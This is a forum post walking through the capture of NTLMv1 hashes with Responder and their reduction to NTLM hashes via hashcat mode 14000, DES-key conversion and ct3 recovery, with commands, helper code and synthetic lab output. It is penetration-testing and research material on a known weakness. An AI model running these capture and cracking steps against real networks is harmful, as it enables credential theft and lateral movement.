03-03-2020, 11:26 PM
So I made life easy for the mode 14000 reversing NTLMv1 to NTLM, both with and without SSP. I am adding this writeup on hashcat to save people time while searching for it. The original credit goes to atom for developing mode 14000 and his original writeups.
** All hashes in this writeup are synthetic and exist only in a lab machine; they are used for illustration purposes, and in no way should you ever post hashes on the hashcat forums. I warrant that these did not come from a live production system or one where any kind of client or customer data ever existed.
First of all the link to the tool:
https://github.com/evilmog/ntlmv1-multi
Step 1, obtain a hash:
Without SSP if LM is enabled
Code:
responder -I eth0 --lm -wrfFP
Code:
[SMB] NTLMv1 Client : 184.64.60.62
[SMB] NTLMv1 Username : DUSTIN-5AA37877\hashcat
[SMB] NTLMv1 Hash : hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788
The hash portion looks like this:
Code:
hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788
Now if LM is disabled but NTLMv1 is still enabled as per https://docs.microsoft.com/en-us/windows...tion-level at a level of 2 then we have to contend with SSP:
Code:
responder -I eth0 -wrfFP
The output looks like this:
Code:
[SMB] NTLMv1-SSP Client : 184.64.60.62
[SMB] NTLMv1-SSP Username : DUSTIN-5AA37877\hashcat
[SMB] NTLMv1-SSP Hash : hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788
The SSP hash will look like this:
Code:
hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788
The important thing to notice is all the 0000000's in the lm portion of the hash.
NTLMv1 looks like this:
username:blank:realmname/domainname:lm:nt:challenge
The important part about SSP, due to the lack of LM, is that the Client challenge gets changed to an SRV Challenge. The Python code for the srvchallenge looks like this:
Code:
import binascii
import hashlib

# Fields of a responder-style line: user::domain:lmresp:ntresp:challenge
hashsplit = ntlmv1_hash.split(":")
lmresp = hashsplit[3]
ntresp = hashsplit[4]

if lmresp[20:48] == "0000000000000000000000000000":
    # Zero-padded LM field: the first 8 bytes are the client nonce (ESS / NTLM2 session)
    print("Hash response is ESS, consider using responder with --lm")
    clientchallenge = hashsplit[5]
    # DES input actually used by the client is MD5(server challenge || client nonce)[:8]
    combinedchallenge = clientchallenge + lmresp[0:16]
    m = hashlib.md5()
    m.update(binascii.unhexlify(combinedchallenge))
    md5hash = m.hexdigest()
    srvchallenge = md5hash[0:16]
    # The two full 8-byte DES blocks of the NT response; the last 8 bytes are ct3
    ct1 = ntresp[0:16]
    ct2 = ntresp[16:32]
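To make the ESS case concrete, here is an added example (not code from ntlmv1-multi or the post) that parses a responder-style NTLMv1 line, detects the zero-padded LM field that marks an ESS/NTLM2 session response, derives the effective challenge the same way the snippet above does, and splits the NT response into the two 14000-format blocks plus the 2-byte ct3 remainder. The sample lines are the synthetic lab hashes from this post; the function and variable names are my own.

```python
import binascii
import hashlib

# Constructed samples: the two synthetic lab captures quoted in this post.
SAMPLE_SSP = ("hashcat::DUSTIN-5AA37877:"
              "85D5BC2CE95161CD00000000000000000000000000000000:"
              "892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:"
              "1122334455667788")
SAMPLE_LM = ("hashcat::DUSTIN-5AA37877:"
             "76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:"
             "727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:"
             "1122334455667788")


def parse_ntlmv1(line):
    """Split a responder-style line: user::domain:lmresp:ntresp:challenge."""
    parts = line.strip().split(":")
    if len(parts) != 6:
        raise ValueError("expected 6 colon-separated fields, got %d" % len(parts))
    user, _blank, domain, lmresp, ntresp, challenge = parts
    # NTLMv1: 24-byte LM response, 24-byte NT response, 8-byte server challenge
    if len(lmresp) != 48 or len(ntresp) != 48 or len(challenge) != 16:
        raise ValueError("field lengths do not match NTLMv1 (24/24/8 bytes)")
    return {"user": user, "domain": domain, "lmresp": lmresp.upper(),
            "ntresp": ntresp.upper(), "challenge": challenge.lower()}


def is_ess(lmresp):
    """ESS / NTLM2 session: the LM field is an 8-byte client nonce padded with zeros."""
    return lmresp[16:48] == "0" * 32


def effective_challenge(server_challenge, lmresp):
    """Under ESS the client DES-encrypts MD5(server_challenge || client_nonce)[:8],
    which ntlmv1-multi reports as the 'SRV Challenge'."""
    client_nonce = lmresp[0:16]
    digest = hashlib.md5(binascii.unhexlify(server_challenge + client_nonce)).hexdigest()
    return digest[0:16]


def split_for_14000(line):
    """Return the challenge really used, the two full DES blocks in -m 14000 form
    (ciphertext:challenge) and the 8-byte ct3 block that only has 2^16 possible keys."""
    h = parse_ntlmv1(line)
    ess = is_ess(h["lmresp"])
    chal = effective_challenge(h["challenge"], h["lmresp"]) if ess else h["challenge"]
    ct1, ct2, ct3 = h["ntresp"][0:16], h["ntresp"][16:32], h["ntresp"][32:48]
    return {"ess": ess, "challenge": chal,
            "hashcat_lines": ["%s:%s" % (ct1, chal), "%s:%s" % (ct2, chal)],
            "ct3": ct3}


if __name__ == "__main__":
    for sample in (SAMPLE_SSP, SAMPLE_LM):
        r = split_for_14000(sample)
        print("ESS:", r["ess"], "challenge:", r["challenge"])
        for l in r["hashcat_lines"]:
            print("  14000:", l)
        print("  ct3:", r["ct3"])
```

For the SSP sample the challenge written into the 14000 lines is the MD5-derived value, not the 1122334455667788 the server sent, which is why the tool's "SRV Challenge" differs from the "Client Challenge" it prints; for the --lm capture the server challenge is used as is.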
Step 2) we take our hash and we feed it to the NTLMv1 multi tool
Code:
python ntlmv1.py --ntlmv1 "hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788"
Hash response is ESS, consider using responder with --lm
Hashfield Split:
['hashcat', '', 'DUSTIN-5AA37877', '85D5BC2CE95161CD00000000000000000000000000000000', '892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0', '1122334455667788']
Hostname: DUSTIN-5AA37877
Username: hashcat
LM Response: 85D5BC2CE95161CD00000000000000000000000000000000
NT Response: 892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0
Client Challenge: 1122334455667788
SRV Challenge: b36d2b9a8607ea77
To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin 2BBD6C9ABCD021D0 1122334455667788 85D5BC2CE95161CD00000000000000000000000000000000
To crack with hashcat create a file with the following contents:
892F905962F76D32:b36d2b9a8607ea77
3837F613F88DE27C:b36d2b9a8607ea77
echo "892F905962F76D32:b36d2b9a8607ea77">>14000.hash
echo "3837F613F88DE27C:b36d2b9a8607ea77">>14000.hash
To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1
To Crack with crack.sh use the following token
$NETLM$b36d2b9a8607ea77$892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0
Step 3) we create 14000.hash, thankfully the tool outputs the command to do this:
Code:
echo "892F905962F76D32:b36d2b9a8607ea77">>14000.hash
echo "3837F613F88DE27C:b36d2b9a8607ea77">>14000.hash
Step 4) crack with hashcat. That being said, I already know the output, and this will take about 3 days or so on 32 GTX 1080s, so in order to verify I have nothing up my sleeve there is a tool in the repo that converts NTLM keys to DES keys:
Code:
python ntlm-to-des.py --ntlm 8846f7eaee8fb117ad06bdd830b7586c
DESKEY1: b55d6d05e6792652
DESKEY2: bdba82e6895a9d6a
echo b55d6d05e6792652>>des.cand
echo bdba82e6895a9d6a>>des.cand
We now run the echo commands it spat out, as well as the commands for the 14000.hash creation, and actually crack with hashcat:
Code:
evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ echo '$HEX[8923bdfdaf753f63]'>>des.cand
evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ echo '$HEX[17d741d7ddc1c36f]'>>des.cand
evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ echo "892F905962F76D32:b36d2b9a8607ea77">>14000.hash
evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ echo "3837F613F88DE27C:b36d2b9a8607ea77">>14000.hash
evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ ~/git/hashcat/hashcat/hashcat -d 3 -m 14000 -a 0 14000.hash des.cand
...truncated...
892f905962f76d32:b36d2b9a8607ea77:$HEX[8923bdfdaf753f63]
3837f613f88de27c:b36d2b9a8607ea77:$HEX[17d741d7ddc1c36f]
...truncated...
Step 5) convert the DES keys to NTLM:
Code:
evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ ~/git/hashcat-utils/src/deskey_to_ntlm.pl 8923bdfdaf753f63
8846f7eaee8fb1
evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ ~/git/hashcat-utils/src/deskey_to_ntlm.pl 17d741d7ddc1c36f
17ad06bdd830b7
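The NTLM-to-DES and DES-to-NTLM conversions in steps 4 and 5 are just bit repacking: NTLMv1 splits the 16-byte NT hash into 7 + 7 + 2 bytes and turns each 7-byte piece into a 56-bit DES key (the third key is the last 2 bytes padded with five zero bytes, which is why ct3 has only 2^16 candidates). The following is an added example of both directions, not the repo's ntlm-to-des.py or hashcat-utils' deskey_to_ntlm.pl; it writes keys in the form hashcat -m 14000 printed them in this post (7 key bits per byte with the low bit set). The test vectors are the NT hash of "password" and the cracked keys from this post; function names are mine.

```python
def _bits(data):
    """Big-endian bit string of a byte sequence."""
    return "".join(format(b, "08b") for b in data)


def _expand_7_to_8(seven_bytes):
    """56 bits -> 8 DES key bytes, 7 key bits each, low (parity) bit set to 1."""
    bits = _bits(seven_bytes)
    return bytes((int(bits[i:i + 7], 2) << 1) | 1 for i in range(0, 56, 7))


def ntlm_to_des_keys(ntlm_hex):
    """Return (des_key1, des_key2, tail) for a 16-byte NT hash: the two full DES keys
    as hex, plus the 2 trailing bytes that form the zero-padded third key."""
    nt = bytes.fromhex(ntlm_hex)
    if len(nt) != 16:
        raise ValueError("NT hash must be 16 bytes")
    return (_expand_7_to_8(nt[0:7]).hex(),
            _expand_7_to_8(nt[7:14]).hex(),
            nt[14:16].hex())


def third_des_key(tail_hex):
    """The third NTLMv1 DES key: the last 2 NT-hash bytes followed by five zero bytes."""
    tail = bytes.fromhex(tail_hex)
    if len(tail) != 2:
        raise ValueError("tail must be 2 bytes")
    return _expand_7_to_8(tail + b"\x00" * 5).hex()


def des_key_to_ntlm(des_key_hex):
    """Inverse of _expand_7_to_8: drop each parity bit and repack 56 bits into 7 bytes."""
    key = bytes.fromhex(des_key_hex)
    if len(key) != 8:
        raise ValueError("DES key must be 8 bytes")
    bits = "".join(format(b >> 1, "07b") for b in key)
    return bytes(int(bits[i:i + 8], 2) for i in range(0, 56, 8)).hex()


def reassemble_ntlm(des_key1_hex, des_key2_hex, tail_hex):
    """Step 7 of the post: 7 + 7 + 2 bytes stitched back into the full NT hash."""
    return des_key_to_ntlm(des_key1_hex) + des_key_to_ntlm(des_key2_hex) + tail_hex.lower()


if __name__ == "__main__":
    # Constructed input: NT hash of "password", as computed in step 8 of the post.
    k1, k2, tail = ntlm_to_des_keys("8846f7eaee8fb117ad06bdd830b7586c")
    print("DESKEY1:", k1, "DESKEY2:", k2, "DESKEY3:", third_des_key(tail))
    print("NTLM:", reassemble_ntlm(k1, k2, tail))
```

Parity bits are ignored by DES itself, so any key byte with the same upper 7 bits encrypts identically; that is why a 14000 crack only needs the 128 odd bytes of DES_full.charset per position, and why deskey_to_ntlm discards the low bit of each byte rather than checking it.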
Step 6) calculate ct3:
Code:
~/git/hashcat-utils/src/./ct3_to_ntlm.bin 2BBD6C9ABCD021D0 1122334455667788 85D5BC2CE95161CD00000000000000000000000000000000
586c
Alternatively, you can swap out 1122334455667788 for the newly calculated SRV Challenge:
Code:
~/git/hashcat-utils/src/./ct3_to_ntlm.bin 2BBD6C9ABCD021D0 b36d2b9a8607ea77
586c
Step 7) stitch them together:
8846f7eaee8fb1 17ad06bdd830b7 586c
Step 8) verification to prove this all works:
Code:
echo -n password | iconv -f utf8 -t utf16le | openssl dgst -md4
(stdin)= 8846f7eaee8fb117ad06bdd830b7586c
~/git/hashcat/hashcat/hashcat -m 5500 -d 3 ntlmv1.txt cand
...truncated...
hashcat::DUSTIN-5AA37877:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595:1122334455667788:password
hashcat::DUSTIN-5AA37877:85d5bc2ce95161cd00000000000000000000000000000000:892f905962f76d323837f613f88de27c2bbd6c9abcd021d0:1122334455667788:password
Step 9) be lazy and use the crack.sh tokens provided and pay $ to crack, or use the 1122334455667788 challenge if you can get a solid LM.